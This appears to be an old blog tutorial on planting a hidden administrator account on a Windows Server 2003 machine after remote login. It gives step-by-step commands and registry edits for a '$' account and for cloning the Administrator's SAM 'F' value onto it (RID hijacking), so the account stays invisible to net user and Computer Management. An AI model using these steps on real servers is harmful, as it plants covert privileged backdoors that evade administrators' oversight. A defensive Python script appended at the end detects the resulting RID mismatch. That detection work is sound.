How to thoroughly hide an account on a Win2003 server
Monday, November 19, 2007, 2:36 PM
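After logging in over 3389:
First create the user wenping$:
c:\>net user wenping$ 123456 /add
The trailing $ keeps the account from showing up when net user is run at the console. Then run regedt32.exe (note: not regedit.exe).
First locate HKEY_LOCAL_MACHINE\SAM\SAM and select it, then open "Security" -> "Permissions" in the menu, add the account or group you are currently logged in as, tick "Allow" for "Full Control" under "Permissions", and click OK.
The local SAM information can now be read directly. Now run regedit.exe.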
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$ and check its default value, which shows as "0x3e8". Export the corresponding keys as follows:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$ as wenping$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E8 as 3e8.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 as 1f4.reg (the corresponding key for Administrator)
Open 1f4.reg in Notepad and find the "F" value, which in this example is:
"F"=hex:02,00,01,00,00,00,00,00,50,80,a2,96,08,03,c7,01,00,00,00,00,00,00,00,\
  00,d0,24,2b,8a,14,c9,c6,01,00,00,00,00,00,00,00,00,a0,81,18,6e,d3,e0,c6,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,57,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
Copy it, open 3e8.reg, find the "F" value there, delete it, and paste in the value copied above. Then open wenping$.reg and copy its contents, which in this example are:
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$]
@=hex(3e8):
Go back to 3e8.reg and paste this at the end of the file. The resulting file looks like this:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003e8]
"F"=hex:02,00,01,00,00,00,00,00,50,80,a2,96,08,03,c7,01,00,00,00,00,00,00,00,\
  00,d0,24,2b,8a,14,c9,c6,01,00,00,00,00,00,00,00,00,a0,81,18,6e,d3,e0,c6,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,57,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
"V"=hex: (the "V" value as exported for wenping$, left unchanged)

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$]
@=hex(3e8):

After saving, delete the wenping$ user (the newly added account must be deleted before the import):
c:\>net user wenping$ /delete
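Run regedit.exe and import the 3e8.reg file we modified. Finally, open regedt32.exe, locate HKEY_LOCAL_MACHINE\SAM\SAM and select it, then under "Security" -> "Permissions" in the menu remove the account added earlier. Then log off the current user and log in as wenping$ / 123456; the account will have the highest privileges.
Cloning on 2003 differs slightly from cloning on 2000; the difference is the first part of this article.
This creates an account, wenping$, that is visible neither with net user at the console nor in "Computer Management". Remember to set the password correctly the first time and do not change it afterwards, otherwise it will stop working.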
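From the defender's side, the paste described above leaves a detectable artifact: the Users\000003E8 key ends up holding an "F" value whose bytes f4,01,00,00 at offset 0x30 still name RID 0x1F4. The following check is an added example, not code from the original post; it scans a regedit export of the Users key for that mismatch. The function names are hypothetical, the offset is read from the article's example "F" value, and the sample export is constructed from that value.

```python
import re
import struct

# Assumption: the RID sits at offset 0x30, as in the article's example "F" value.
RID_OFFSET = 0x30
KEY_RE = re.compile(r"^\[.*\\Account\\Users\\([0-9A-Fa-f]{8})\]$")
F_RE = re.compile(r'^"F"=hex:(.*)$')

def parse_user_f_values(reg_text):
    """Map each Users\\<RID> key name (as an int) to its raw "F" bytes."""
    # regedit wraps long hex values with a trailing backslash; join them first.
    text = re.sub(r"\\\r?\n\s*", "", reg_text)
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            key = KEY_RE.match(line)
            current = int(key.group(1), 16) if key else None
        elif current is not None and (val := F_RE.match(line)):
            result[current] = bytes.fromhex(val.group(1).replace(",", ""))
    return result

def find_rid_mismatches(reg_text):
    """Return (key_rid, embedded_rid) pairs where the key name and "F" disagree."""
    hits = []
    for key_rid, f_value in sorted(parse_user_f_values(reg_text).items()):
        if len(f_value) < RID_OFFSET + 4:
            continue  # truncated value, nothing to compare
        (embedded,) = struct.unpack_from("<I", f_value, RID_OFFSET)
        if embedded != key_rid:
            hits.append((key_rid, embedded))
    return hits

# Constructed sample export: both keys carry the article's example "F" value.
ADMIN_F = r'''"F"=hex:02,00,01,00,00,00,00,00,50,80,a2,96,08,03,c7,01,00,00,00,00,00,00,00,\
  00,d0,24,2b,8a,14,c9,c6,01,00,00,00,00,00,00,00,00,a0,81,18,6e,d3,e0,c6,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,57,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
'''
SAMPLE = (
    "Windows Registry Editor Version 5.00\n\n"
    + r"[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]" + "\n" + ADMIN_F + "\n"
    + r"[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E8]" + "\n" + ADMIN_F
)

if __name__ == "__main__":
    for key_rid, embedded in find_rid_mismatches(SAMPLE):
        print(f"Users\\{key_rid:08X}: F value carries RID {embedded:#x}")
```

Any key it reports is an account whose stored RID does not match its own key name, which does not happen through normal account management.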